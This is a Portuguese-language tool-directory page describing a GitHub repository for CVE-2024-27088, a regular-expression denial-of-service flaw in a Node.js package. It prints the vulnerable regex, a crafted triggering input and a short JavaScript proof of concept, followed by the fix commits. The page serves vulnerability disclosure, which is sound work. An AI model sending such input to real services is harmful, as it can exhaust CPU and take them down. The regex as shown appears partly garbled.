Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/200101whoami/cve-2024-27088
Análise EstáticaAnálise de VulnerabilidadesAnálise de CódigoPapers e PesquisaAprendizado e Educação
GitHub200101whoami/cve-2024-27088

CVE-2024-27088

redos

Ver Repositório
2há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-27088

Resumo da Vulnerabilidade

  • CVE-2024-27088
  • Feb 26, 2024
  • ReDoS em pacote node.js
  • Parte do projeto rebob

Descrição da Vulnerabilidade

github advisories

root@kitploit:~
/^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/

Esta vulnerabilidade pode ser explorada quando há um desequilíbrio nos parênteses, o que resulta em backtracking excessivo e, consequentemente, aumenta significativamente a carga da CPU e o tempo de processamento. Esta vulnerabilidade pode ser desencadeada usando a seguinte entrada:

'function{' + 'n'.repeat(31) + '){'

Aqui está um código PoC simples para demonstrar o problema:

root@kitploit:~
const protocolre = /^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/;

const startTime = Date.now();
const maliciousInput = 'function{' + 'n'.repeat(31) + '){'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

Impacto

Passar funções com nomes muito longos ou nomes de argumentos padrão complexos para function#copy ou function#toStringTokens pode travar o script.

Correções Corrigido com 3551cdd e a52e957 Publicado com v0.10.63

Soluções Alternativas Não há solução alternativa real além de evitar o uso das utilidades acima.

issue target package

Baixar ferramenta